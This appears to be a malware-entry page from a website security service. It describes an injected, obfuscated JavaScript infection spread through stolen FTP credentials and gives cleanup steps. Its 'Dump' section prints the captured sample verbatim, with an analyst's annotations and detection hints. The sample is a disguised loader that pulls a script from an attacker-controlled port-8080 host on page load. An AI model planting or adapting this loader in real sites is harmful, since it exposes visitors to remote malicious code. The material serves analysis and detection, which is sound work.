An infection in which attackers injected malicious, obfuscated JavaScript that contained comments such as /*GNU GPL*/ and /*LGPL*/ to make the scripts look legitimate.
The scripts dynamically loaded malicious content from sites controlled by the criminals. Those sites were served on port 8080, and their URLs contained multiple subdomains and
subdirectories named after legitimate sites. E.g.
hxxp://taringa-net .focus .de .soufun-com .thelaceweb.ru:8080/gutefrage .net/gutefrage .net/google .com/commentcamarche .net/smh .com .au/
You can read more about it in this blog post
Affecting
Any website with FTP access.
Cleanup
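This attack used stolen FTP credentials, so it is important to first remove malware from all computers used to access the site, then change the FTP passwords (do not save the new passwords
in FTP clients), and only then remove the malicious script from all files on the server. The order matters: if a computer is still infected, the new passwords can be stolen again and the site reinfected.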
You can sign up with us and let our team remove the malware for you.
Dump
<!--
  Captured malware sample, reproduced verbatim as evidence. Do not deploy or execute it.

  What the visible code does:
  * Opens with a fake LGPL licence comment so the injected block resembles legitimate library code.
  * Assigns window.onload (replacing any handler the page had set that way). The handler calls
    document.createElement, sets four attributes on the new element, and appends it to document.body.
  * The tag name, attribute names and attribute values are string literals padded with punctuation
    characters and passed through .replace() with an alternation of those same characters. With the
    padding removed the literals read "script", "defer", "text/javascript", a random-looking id, and
    a "src" whose value is the port 8080 URL shown defanged in the description above.
  * The whole body sits in a try block with an empty catch, so any failure is silent to the visitor.

  NOTE(review): the regex literals appear to have lost their backslash escapes when this page was
  extracted (for example an unescaped ")" directly after the opening "/"), so the text as shown is
  probably not valid JavaScript. Confirm against an original capture before using it as a signature.

  Detection hints drawn from this sample: a licence comment immediately followed by try{ and a
  window.onload assignment, createElement fed by a .replace() call over a punctuation alternation,
  and a script source on port 8080.

  The trailing 32 hex character comment is reproduced as found. The page does not say whether it is
  part of the injection; verify before relying on it as a marker.
-->
<script>/*LGPL*/ try{ window.onload = function(){var F5u18d6lz4y5 = document.createElement('s()))c&@)r$#i@!^p@@^t^#'.replace(/)|$|(|@|!|^|&|#/ig, ''));F5u18d6lz4y5.setAttribute('defer', 'd#&e!&^&f$@e#&!((r#'.replace(/&|@|$|^|#|)|!|(/ig, ''));F5u18d6lz4y5.setAttribute('type', 't))&e)!x&(()t@&/^#)j^a!v$)@a^(s()#c@$r(^!i$)(p&t^#!^'.replace(/^|&|$|#|@|(|)|!/ig, ''));F5u18d6lz4y5.setAttribute('id', 'P$^(6(&&&v)$^7))&f#5&##7!#!#3!(&^3()c$($@z(z&$'.replace(/#|(|)|&|@|!|$|^/ig, ''));F5u18d6lz4y5.setAttribute('s)$r@$c$)'.replace(/#|)|^|!|&|@|(|$/ig, ''), 'h!(!t!!@!t&!!p&:&#/$!)/(^@^t$^a^(r!&)i@^n$&g($a@-(^(n#@&e##@)t!&!@.$$f#(^!o&$!c(u(#s#@&.@(d()e&(.^@(s)^o!(u#(&f#^$$u(#n^@^-$^&#c^#@#o&#m$^(.!)@()t@&#h(!e@@^l&)#a$($c)($e^@w)$e^^(b#^.$)(#r()u)#:)!@)8^@^#0@8#(0(!/@(g$(#u&^t#!$e^^$&f^!&r!!a(&!@g&&!e).)$n$)e^&t)((/(@g(@@u@^t(@e)^f@)#!&r#!a^&@g!!(&e^!^$.!#n#@($e!&!!t(@(!/!&g#(&@o^!o!^&@g&@l^()@e!.&c$)o&@#^^m@$)/!^@c#$o!m@##$m@&)e^n$$t#c#!a^m^$a(#r!))c(h!&$^e&)^.^@@@n^)e^^)t!$&/!^s($m#&$^h$#).$@@c#&&o#m))#.(a!$u()/^^'.replace(/!|@|^|#|)|$|(|&/ig, ''));if (document){document.body.appendChild(F5u18d6lz4y5);}} } catch(Evpg5sbi49zcg0lkkgdl) {}</script>
<!--6794ad2fcbfff154945923c76e848e03-->